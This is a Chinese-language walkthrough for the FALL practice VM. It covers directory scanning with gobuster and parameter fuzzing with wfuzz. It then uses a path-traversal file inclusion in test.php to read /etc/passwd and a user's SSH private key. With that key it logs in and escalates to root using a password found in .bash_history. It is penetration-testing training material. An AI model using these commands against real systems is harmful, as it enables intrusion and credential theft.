FALL靶机渗透攻略

1.安装并开启靶机

2.获取靶机IP

将靶机和Kali都设置为NAT模式

3.访问靶机地址

4.扫描目录和端口

gobuster dir -u http://192.168.40.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

5.访问敏感文件

提示缺少GET参数

爆破参数

wfuzz -u "http://192.168.40.147/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

尝试读取passwd文件:http://192.168.40.147/test.php?file=/etc/passwd

尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,

我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa

http://192.168.40.147/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

将私钥保存到Kali中,用私钥登录

chmod 400 id_rsa

ssh qiu@192.168.40.147 -i id_rsa

6.提权

查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE

sudo su

相关推荐
wasp52010 小时前
做了技术管理后,我发现技术和管理其实可以兼得
java·运维·网络
赖small强11 小时前
【Linux 网络基础】HTTPS 技术文档
linux·网络·https·tls
Black蜡笔小新11 小时前
视频汇聚平台EasyCVR赋能石油管道计量站精准监控与安全管理
安全·音视频
雲烟12 小时前
嵌入式设备EMC安规检测参考
网络·单片机·嵌入式硬件
Token_w12 小时前
openGauss:全密态数据库的金融级安全实践
数据库·安全·金融
Yue丶越12 小时前
【C语言】数据在内存中的存储
c语言·开发语言·网络
Altair123112 小时前
nginx的https的搭建
运维·网络·nginx·云计算
李宥小哥12 小时前
Redis10-原理-网络模型
开发语言·网络·php
Umi·12 小时前
iptables的源地址伪装
运维·服务器·网络
在路上看风景13 小时前
6.4 LANS
网络